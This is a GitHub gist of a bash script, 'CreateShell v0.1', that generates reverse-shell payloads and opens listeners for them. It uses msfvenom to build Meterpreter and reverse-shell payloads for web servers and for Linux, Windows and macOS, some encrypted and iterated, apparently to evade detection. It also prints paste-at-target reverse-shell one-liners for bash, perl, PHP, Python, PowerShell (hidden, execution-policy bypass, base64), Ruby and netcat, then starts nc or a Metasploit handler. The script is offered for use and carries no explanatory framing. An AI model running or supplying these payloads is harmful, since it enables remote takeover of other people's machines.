Created
January 15, 2025 23:19
-
-
Save danieljs777/1fa77c21a08d48a376bd1150ac9a2b73 to your computer and use it in GitHub Desktop.
A fast way to generate payloads and open listeners for reverse shells
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| if [ $# -eq 0 ] | |
| then | |
| echo "##############################################################"; | |
| echo "# CreateShell v0.1 - A fast way to generate payloads and open listeners for reverse shells"; | |
| echo "# By Daniel ([email protected]) "; | |
| echo "# Usage: createshell.sh lhost lport payload "; | |
| echo "#"; | |
| echo "# MSF short payloads : "; | |
| echo "# [php|jsp|war|asp|python|bash|perl|linux32|linux64|win32|win64|osx]"; | |
| echo "# OR [msfvenom_default_payload]"; | |
| echo "#"; | |
| echo "# Raw payloads : "; | |
| echo "# [rawbash|rawbash2|rawperl|rawphp|rawphp_shellexec|rawphp_system|rawpython|rawps|rawps2|rawps_base64|rawnc]"; | |
| exit; | |
| fi | |
| case "$3" in | |
| ############################# | |
| #WEB SERVERS | |
| "php") | |
| payload="php/meterpreter_reverse_tcp"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.php; | |
| ;; | |
| "jsp") | |
| payload="java/jsp_shell_reverse_tcp"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.jsp; | |
| ;; | |
| "war") | |
| payload="java/jsp_shell_reverse_tcp"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f war > shell.war; | |
| ;; | |
| "asp") | |
| payload="windows/meterpreter/reverse_tcp"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f asp > shell.asp; | |
| ;; | |
| ############################# | |
| #LOCAL INTERPRETERS | |
| "python") | |
| payload="cmd/unix/reverse_python"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.py | |
| ;; | |
| "bash") | |
| payload="cmd/unix/reverse_bash"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.sh | |
| ;; | |
| "perl") | |
| payload="cmd/unix/reverse_perl"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f raw > shell.pl | |
| ;; | |
| ############################# | |
| #OPERATING SYSTEMS | |
| "linux32") | |
| payload="linux/x86/meterpreter/reverse_tcp"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f elf --encrypt aes256 --encrypt-key dj38jdewjfdeifjeowfj0fj443f4f -i 10 > shell.elf | |
| ;; | |
| "linux64") | |
| payload="linux/x64/meterpreter/reverse_tcp"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f elf --encrypt aes256 --encrypt-key dj38jdewjfdeifjeowfj0fj443f4f -i 10 > shell.elf | |
| ;; | |
| "win32") | |
| payload="windows/meterpreter/reverse_tcp"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f exe --encrypt aes256 --encrypt-key dj38jdewjfdeifjeowfj0fj443f4f -i 10 > shell.exe | |
| ;; | |
| "win64") | |
| payload="windows/x64/meterpreter/reverse_tcp"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f exe --encrypt aes256 --encrypt-key dj38jdewjfdeifjeowfj0fj443f4f -i 10 > shell.exe | |
| ;; | |
| "osx") | |
| payload="osx/x86/shell_reverse_tcp"; | |
| echo "Generating $payload"; | |
| msfvenom -p $payload LHOST=$1 LPORT=$2 -f macho --encrypt aes256 --encrypt-key dj38jdewjfdeifjeowfj0fj443f4f -i 10 > shell.macho | |
| ;; | |
| ############################# | |
| #RAW CONNECTIONS WITHOUT NC ON TARGET | |
| "rawbash") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo 'bash -i >& /dev/tcp/'$1'/'$2' 0>&1'; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawbash2") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo '0<&196;exec 196<>/dev/tcp/'$1'/'$2'; bash <&196 >&196 2>&196'; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawperl") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo "perl -e 'use Socket;"'$i="'$1'";''$p='$2';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"'"; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawphp") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo "php -r '"'$sock=fsockopen("'$1'",'$2');exec("/bin/sh -i <&3 >&3 2>&3");'"'"; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawphp_shellexec") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo "php -r '"'$sock=fsockopen("'$1'",'$2');shell_exec("/bin/sh -i <&3 >&3 2>&3");'"'"; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawphp_system") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo "php -r '"'$sock=fsockopen("'$1'",'$2');system("/bin/sh -i <&3 >&3 2>&3");'"'"; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawpython") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("'"'$1'"'","$2"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["'"/bin/sh"'","'"-i"'"]);'"; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawps") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo 'powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("'$1'",'$2');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawps2") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo "powershell -nop -c \"\$client = New-Object System.Net.Sockets.TCPClient('"$1"',"$2");\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + '"'PS '"' + (pwd).Path + '"'> '"';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush()};\$client.Close()\""; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawps_base64") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo 'powershell -e '; | |
| echo '$client = New-Object System.Net.Sockets.TCPClient("'$1'",'$2');$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | base64; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawruby") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo "ruby -rsocket -e'f=TCPSocket.open(\""$1\"","$2").to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| "rawnc") | |
| echo '###########################'; | |
| echo 'Type at target: '; | |
| echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc "$1" "$2" >/tmp/f"; | |
| echo ''; | |
| echo '###########################'; | |
| nc -lvnp $2; | |
| exit; | |
| ;; | |
| *) | |
| echo '###########################'; | |
| echo 'Right! Custom payload detected! Please input your desired format:' | |
| read format | |
| echo 'Right! Please input desired final extension:' | |
| read extension | |
| echo msfvenom -p $3 LHOST=$1 LPORT=$2 -f $format --encrypt aes256 --encrypt-key dj38jdewjfdeifjeowfj0fj443f4f -i 10 > shell.$extension; | |
| payload="$3"; | |
| ;; | |
| esac | |
| if [ -z "$payload" ] | |
| then | |
| echo "Payload missed" | |
| else | |
| msfconsole -x "use exploit/multi/handler;set PAYLOAD $payload;set LHOST $1;set LPORT $2;set ExitOnSession false;exploit -j -z"; | |
| fi | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment